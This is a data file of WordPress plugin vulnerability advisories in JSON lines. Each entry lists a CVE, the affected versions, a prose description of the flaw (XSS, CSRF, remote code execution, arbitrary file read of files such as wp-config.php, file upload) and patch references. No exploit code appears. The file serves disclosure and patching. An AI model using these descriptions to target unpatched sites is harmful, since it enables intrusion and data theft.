{"CVE_ID":"CVE-2024-4567","slug":"themify-shortcodes","versionImpact":"2.0.9","versionEndExcluding":"2.1.0","description":"The Themify Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's themify_button shortcode in all versions up to, and including, 2.0.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c63ff9d7-6a14-4186-8550-4e5c50855e7f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c63ff9d7-6a14-4186-8550-4e5c50855e7f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082885\\\/themify-shortcodes\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082885\\\/themify-shortcodes\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0588","slug":"catalyst-connect-client-portal","versionEndExcluding":"2.1.0","description":"The Catalyst Connect Zoho CRM Client Portal WordPress plugin before 2.1.0 does not sanitize and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high-privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/84be272e-0891-461c-91ad-496b64f92f8f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/84be272e-0891-461c-91ad-496b64f92f8f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0535","slug":"donations-block","versionEndExcluding":"2.1.0","description":"The Donation Block For PayPal WordPress plugin before 2.1.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c50321a-dba8-4379-9b9c-4c349e44b2ed\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c50321a-dba8-4379-9b9c-4c349e44b2ed\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5396","slug":"bears-backup","versionImpact":"2.0.0","versionEndExcluding":"2.1.0","description":"The Bears Backup plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.0.0. This is due to the bbackup_ajax_handle() function not having a capability check, nor validating user supplied input passed directly to call_user_func(). This makes it possible for unauthenticated attackers to execute code on the server which can be leverage to inject backdoors or create new administrative user accounts to name a few things. On WordPress sites running the Alone theme versions 7.8.4 and older, this can be chained with CVE-2025-5394 to install the Bears Backup plugin and achieve the same impact.","recommendation":"Update to version 2.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/alone-charity-multipurpose-nonprofit-wordpress-theme\\\/15019939\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/alone-charity-multipurpose-nonprofit-wordpress-theme\\\/15019939\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81b44abb-6d30-4930-b68b-9a04d93f5169?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81b44abb-6d30-4930-b68b-9a04d93f5169?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2013-10026","slug":"mail-subscribe-list","versionEndExcluding":"2.1","description":"A vulnerability, which was classified as problematic, has been found in Mail Subscribe List Plugin up to 2.0.10 on WordPress. This issue affects some unknown processing of the file index.php. The manipulation of the argument sml_name\/sml_email leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 2.1 is able to address this issue. The name of the patch is 484970ef8285cae51d2de3bd4e4684d33c956c28. It is recommended to upgrade the affected component. The identifier VDB-227765 was assigned to this vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.227765\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.227765\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/mail-subscribe-list\\\/commit\\\/484970ef8285cae51d2de3bd4e4684d33c956c28\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/mail-subscribe-list\\\/commit\\\/484970ef8285cae51d2de3bd4e4684d33c956c28\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.227765\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.227765\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11334","slug":"my-contador-wp","versionImpact":"2.0","versionEndExcluding":"2.1","description":"The My Contador lesr plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the exportar_registros() function in all versions up to, and including, 2.0. This makes it possible for unauthenticated attackers to export user data.","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/my-contador-wp\\\/trunk\\\/contador.php#L159\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/my-contador-wp\\\/trunk\\\/contador.php#L159\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191748\\\/my-contador-wp\\\/trunk\\\/contador.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191748\\\/my-contador-wp\\\/trunk\\\/contador.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82cfeff9-7079-408e-9c22-bae0d45000ed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82cfeff9-7079-408e-9c22-bae0d45000ed?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10480","slug":"3dprint-lite","versionImpact":"2.0.9.9","versionEndExcluding":"2.1","description":"The 3DPrint Lite WordPress plugin before 2.1 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/725ac766-c849-49d6-a968-58fcc2e134c8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/725ac766-c849-49d6-a968-58fcc2e134c8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4536","slug":"ip-vault-wp-firewall","versionImpact":"1.1","versionEndExcluding":"2.1","description":"The IP Vault \u2013 WP Firewall plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 1.1. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address or country from logging in.","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66e89753-f83e-4e60-b165-6d3d101d6c59?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66e89753-f83e-4e60-b165-6d3d101d6c59?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2922250%40ip-vault-wp-firewall&new=2922250%40ip-vault-wp-firewall&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2922250%40ip-vault-wp-firewall&new=2922250%40ip-vault-wp-firewall&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5362","slug":"spice-post-slider","versionImpact":"2.0","versionEndExcluding":"2.1","description":"The Carousel, Recent Post Slider and Banner Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'spice_post_slider' shortcode in versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0dd70b9-6f8a-41fc-ab4f-f6cdfee8dfb8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0dd70b9-6f8a-41fc-ab4f-f6cdfee8dfb8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spice-post-slider\\\/tags\\\/1.9\\\/include\\\/view\\\/shortcode.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spice-post-slider\\\/tags\\\/1.9\\\/include\\\/view\\\/shortcode.php#L102\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spice-post-slider\\\/tags\\\/2.0.1\\\/include\\\/view\\\/shortcode.php?rev=2981648#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spice-post-slider\\\/tags\\\/2.0.1\\\/include\\\/view\\\/shortcode.php?rev=2981648#L102\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2981654\\\/spice-post-slider\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2981654\\\/spice-post-slider\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-29384","slug":"jobwp","versionEndExcluding":"2.1","description":"Unrestricted Upload of File with Dangerous Type vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin \u2013 JobWP.This issue affects WordPress Job Board and Recruitment Plugin \u2013 JobWP: from n\/a through 2.0.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/jobwp\\\/wordpress-job-board-and-recruitment-plugin-jobwp-plugin-2-0-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/jobwp\\\/wordpress-job-board-and-recruitment-plugin-jobwp-plugin-2-0-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7415","slug":"remember-me-controls","versionImpact":"2.0.1","versionEndExcluding":"2.1","description":"The Remember Me Controls plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.0.1. This is due to the plugin allowing direct access to the bootstrap.php file which has display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01707346-86c2-45c8-a2c9-81a147506fa4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01707346-86c2-45c8-a2c9-81a147506fa4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3146603%40remember-me-controls&new=3146603%40remember-me-controls&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3146603%40remember-me-controls&new=3146603%40remember-me-controls&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/remember-me-controls\\\/tags\\\/2.0.1\\\/tests\\\/phpunit\\\/bootstrap.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/remember-me-controls\\\/tags\\\/2.0.1\\\/tests\\\/phpunit\\\/bootstrap.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4194","slug":"album-and-image-gallery-plus-lightbox","versionImpact":"2.0","versionEndExcluding":"2.1","description":"The The Album and Image Gallery plus Lightbox plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4822f1c7-3f83-416c-8957-17e4b53d7e69?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4822f1c7-3f83-416c-8957-17e4b53d7e69?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/album-and-image-gallery-plus-lightbox\\\/trunk\\\/includes\\\/shortcode\\\/aigpl-gallery-album-slider.php#L207\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/album-and-image-gallery-plus-lightbox\\\/trunk\\\/includes\\\/shortcode\\\/aigpl-gallery-album-slider.php#L207\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/album-and-image-gallery-plus-lightbox\\\/trunk\\\/includes\\\/shortcode\\\/aigpl-gallery-album.php#L185\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/album-and-image-gallery-plus-lightbox\\\/trunk\\\/includes\\\/shortcode\\\/aigpl-gallery-album.php#L185\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1730","slug":"simple-download-counter","versionImpact":"2.0","versionEndExcluding":"2.1","description":"The Simple Download Counter plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 2.0 via the 'simple_download_counter_download_handler'. This makes it possible for authenticated attackers, with Author-level access and above, to extract sensitive data including any local file on the server, such as wp-config.php or \/etc\/passwd.","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-download-counter\\\/tags\\\/2.0\\\/inc\\\/functions-core.php#L328\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-download-counter\\\/tags\\\/2.0\\\/inc\\\/functions-core.php#L328\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-download-counter\\\/tags\\\/2.0\\\/inc\\\/functions-core.php#L354\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-download-counter\\\/tags\\\/2.0\\\/inc\\\/functions-core.php#L354\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247987\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247987\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0eafb20-4ef2-448b-9da7-ad8aa9e45215?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0eafb20-4ef2-448b-9da7-ad8aa9e45215?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12403","slug":"awesome-responsive-photo-gallery","versionImpact":"1.0.5","versionEndExcluding":"2.1","description":"The Image Gallery \u2013 Responsive Photo Gallery plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'awsmgallery' parameter in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-responsive-photo-gallery\\\/trunk\\\/inc\\\/arpg-process-options.php?rev=1877314\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-responsive-photo-gallery\\\/trunk\\\/inc\\\/arpg-process-options.php?rev=1877314\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3221064%40awesome-responsive-photo-gallery&new=3221064%40awesome-responsive-photo-gallery&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3221064%40awesome-responsive-photo-gallery&new=3221064%40awesome-responsive-photo-gallery&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca11e840-04bd-4731-bfa9-3bf8ed98e155?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca11e840-04bd-4731-bfa9-3bf8ed98e155?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5091","slug":"skt-addons-for-elementor","versionImpact":"2.0","versionEndExcluding":"2.1","description":"The SKT Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Age Gate and Creative Slider widgets in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc8d63ee-4929-4940-bc6a-931524e20272?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc8d63ee-4929-4940-bc6a-931524e20272?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098599\\\/skt-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3098599\\\/skt-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7863","slug":"favicon-generator","versionImpact":"1.5","versionEndExcluding":"2.1","description":"The Favicon Generator (CLOSED) WordPress plugin before 2.1 does not validate files to be uploaded and does not have CSRF checks, which could allow attackers to make logged in admin upload arbitrary files such as PHP on the server","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e814b02-3870-4742-905d-ec03b0d31add\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e814b02-3870-4742-905d-ec03b0d31add\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7568","slug":"favicon-generator","versionImpact":"1.5","versionEndExcluding":"2.1","description":"The Favicon Generator plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the output_sub_admin_page_0 function. This makes it possible for unauthenticated attackers to delete arbitrary files on the server via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. The plugin author deleted the functionality of the plugin to patch this issue and close the plugin, we recommend seeking an alternative to this plugin.","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6eb3ad80-3510-4018-91af-b733ef62e28f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6eb3ad80-3510-4018-91af-b733ef62e28f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3139340%40favicon-generator&new=3139340%40favicon-generator&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3139340%40favicon-generator&new=3139340%40favicon-generator&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13583","slug":"simple-gallery-with-filter","versionImpact":"2.0","versionEndExcluding":"2.1","description":"The Simple Gallery with Filter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'c2tw_sgwf' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-gallery-with-filter\\\/trunk\\\/simple-gallery-with-filter.php#L377\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-gallery-with-filter\\\/trunk\\\/simple-gallery-with-filter.php#L377\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227234%40simple-gallery-with-filter&new=3227234%40simple-gallery-with-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3227234%40simple-gallery-with-filter&new=3227234%40simple-gallery-with-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c088264-64a2-4a36-ae3b-fdf60f3837e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c088264-64a2-4a36-ae3b-fdf60f3837e2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12407","slug":"push-notification-for-post-and-buddypress","versionImpact":"2.06","versionEndExcluding":"2.08","description":"The Push Notification for Post and BuddyPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'pushnotificationid' parameter in all versions up to, and including, 2.06 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.08, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/push-notification-for-post-and-buddypress\\\/trunk\\\/admin\\\/pnfpb_admin_ondemand_notification_settings.php#L711\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/push-notification-for-post-and-buddypress\\\/trunk\\\/admin\\\/pnfpb_admin_ondemand_notification_settings.php#L711\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de7be653-4d5b-4cbe-ad9c-6c2748f533bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de7be653-4d5b-4cbe-ad9c-6c2748f533bb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2606","slug":"wpbrutalai","versionEndExcluding":"2.06","description":"The WP Brutal AI WordPress plugin before 2.06 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/62deb3ed-a7e4-4cdc-a615-cad2ec2e1e8f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/62deb3ed-a7e4-4cdc-a615-cad2ec2e1e8f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2017-20194","slug":"formidable","versionEndExcluding":"2.05.03","description":"The Formidable Form Builder plugin for WordPress is vulnerable to Sensitive Data Exposure in versions up to, and including, 2.05.03 via the frm_forms_preview AJAX action. This makes it possible for unauthenticated attackers to export all of the form entries for a given form.","recommendation":"Update to version 2.05.03, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7600fe1-94e4-4e3e-a9a6-ff3589813715?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7600fe1-94e4-4e3e-a9a6-ff3589813715?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/klikki.fi\\\/formidable-forms-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/klikki.fi\\\/formidable-forms-vulnerabilities\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2017-20192","slug":"formidable","versionEndExcluding":"2.05.03","description":"The Formidable Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters submitted during form entries like 'after_html' in versions before 2.05.03 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts that execute in a victim's browser.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/900fcaab-2424-4ae8-af18-95659db0dbe3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/900fcaab-2424-4ae8-af18-95659db0dbe3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/klikki.fi\\\/adv\\\/formidable.html\",\"name\":\"https:\\\/\\\/klikki.fi\\\/adv\\\/formidable.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/formidable\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/formidable\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2012-10017","slug":"portfolio-by-lisa-westlund","versionImpact":"2.04","versionEndExcluding":"2.05","description":"A vulnerability was found in BestWebSoft Portfolio Plugin up to 2.04 on WordPress. It has been classified as problematic. This affects an unknown part. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. Upgrading to version 2.06 is able to address this issue. The patch is named 68af950330c3202a706f0ae9bbb52ceaa17dda9d. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248955.","recommendation":"Update to version 2.05, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.248955\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.248955\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.248955\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.248955\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/portfolio\\\/commit\\\/68af950330c3202a706f0ae9bbb52ceaa17dda9d\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/portfolio\\\/commit\\\/68af950330c3202a706f0ae9bbb52ceaa17dda9d\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4661","slug":"wp-reset","versionImpact":"2.01","versionEndExcluding":"2.03","description":"The WP Reset plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_ajax function in all versions up to, and including, 2.02. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify the value fo the 'License Key' field for the 'Activate Pro License' setting.","recommendation":"Update to version 2.03, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d2dc86e-f937-429f-9baa-0eb0a8715513?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d2dc86e-f937-429f-9baa-0eb0a8715513?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097597\\\/wp-reset\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097597\\\/wp-reset\",\"refsource\":\"\",\"tags\":[]}]"}
